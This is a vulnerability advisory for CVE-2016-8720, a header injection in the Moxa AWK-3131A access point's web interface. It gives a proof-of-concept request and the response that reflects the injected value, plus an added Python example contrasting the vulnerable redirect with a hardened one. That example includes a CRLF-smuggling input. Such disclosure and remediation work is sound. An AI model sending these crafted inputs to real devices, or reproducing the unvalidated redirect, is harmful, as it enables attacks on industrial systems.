CVE-2016-8720
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Wireless Access Point running firmware 1.1. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response.
Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client 1.1
http://www.moxa.com/product/AWK-3131A.htm
3.1 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N
An exploitable HTTP Header Injection vulnerability exists in the Web Application functionality of the Moxa AWK-3131A Series Industrial IEEE 802.11a/b/g/n wireless AP/bridge/client. A specially crafted HTTP request can inject a payload in the bkpath parameter, which is copied into the Location header of the HTTP response. This vulnerability can be exploited in order to execute a variety of other attacks.
Request
POST /forms/iw_webSetParameters HTTP/1.1
Host:

iw_IWtime_timeZone=22&iw_IWtime_dstOnMonth=Oct.&iw_IWtime_dstOnWeekIndex=1st&iw_IWtime_dstOnWeekDay=Sun.&iw_IWtime_dstOnTrigHour=00&iw_IWtime_dstOnTrigMin=00&iw_IWtime_dstOffMonth=Oct.&iw_IWtime_dstOffWeekIndex=Last&iw_IWtime_dstOffWeekDay=Sun.&iw_IWtime_dstOffTrigHour=00&iw_IWtime_dstOffTrigMin=00&iw_IWtime_dstOffsetTime=%2B01%3A00&iw_IWtime_firstTimeSrv=time.nist.gov&iw_IWtime_secondTimeSrv=&iw_IWtime_queryPeriod=600&Submit=Submit&bkpath=EVIL_INJECTION&iw_IWtime_dstEnable=DISABLE
Response
HTTP/1.0 302 Redirect
Server: GoAhead-Webs
Date: Mon Oct 31 17:33:45 2016
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Expires: -1
Content-Type: text/html
Location: http://
<html><head></head><body>
This document has moved to a new <a href="http://<device IP>/EVIL_INJECTION">location</a>.
Please update your documents to reflect the new location.
</body></html>
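The following is an added illustration, not code from the advisory or from Moxa's firmware: it models the faulty pattern described above (the bkpath value copied verbatim into Location) beside a hardened variant that validates the value against a path allowlist and rejects CR/LF, schemes and leading slashes before building the redirect. The allowlist, the fallback page name, the host value and the sample POST body are all constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Hypothetical allowlist for the redirect target: ordinary path characters only.
_SAFE_PATH = re.compile(r"^[A-Za-z0-9_./-]*$")
FALLBACK_PATH = "index.asp"  # placeholder landing page, not taken from the advisory


def bkpath_from_body(body: str) -> str:
    """Return the percent-decoded bkpath value from a form-encoded POST body."""
    return parse_qs(body, keep_blank_values=True).get("bkpath", [""])[0]


def is_safe_bkpath(value: str) -> bool:
    """Reject values that could split headers or redirect away from the device."""
    if "\r" in value or "\n" in value:          # header injection via CRLF
        return False
    if value.startswith(("/", "\\")) or "://" in value:  # off-device redirects
        return False
    return bool(_SAFE_PATH.fullmatch(value))


def vulnerable_redirect(body: str, host: str) -> bytes:
    """The pattern the advisory describes: bkpath is copied straight into Location."""
    path = bkpath_from_body(body)
    return f"HTTP/1.0 302 Redirect\r\nLocation: http://{host}/{path}\r\n\r\n".encode()


def hardened_redirect(body: str, host: str) -> bytes:
    """Same redirect, but an unsafe bkpath is replaced by a fixed fallback path."""
    path = bkpath_from_body(body)
    if not is_safe_bkpath(path):
        path = FALLBACK_PATH
    return f"HTTP/1.0 302 Redirect\r\nLocation: http://{host}/{path}\r\n\r\n".encode()


def response_headers(raw: bytes) -> dict:
    """Parse the header block as a client would, so any injected header shows up."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode("latin-1")
    lines = head.split("\r\n")[1:]  # drop the status line
    return {k.strip(): v.strip() for k, v in (ln.split(":", 1) for ln in lines if ":" in ln)}


# Constructed sample body: a few of the advisory's form fields plus a bkpath that
# carries a CRLF-encoded extra header (%0d%0a) instead of a plain path.
SAMPLE_BODY = ("iw_IWtime_timeZone=22&Submit=Submit"
               "&bkpath=index.asp%0d%0aX-Injected%3a+demo&iw_IWtime_dstEnable=DISABLE")

if __name__ == "__main__":
    print(response_headers(vulnerable_redirect(SAMPLE_BODY, "192.0.2.1")))  # X-Injected present
    print(response_headers(hardened_redirect(SAMPLE_BODY, "192.0.2.1")))    # Location only
```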
To significantly mitigate the risk of exploitation, disable the web application before the device is deployed.
2016-11-14 - Vendor Disclosure
2017-04-10 - Public Release
Discovered by Patrick DeSantis of Cisco Talos.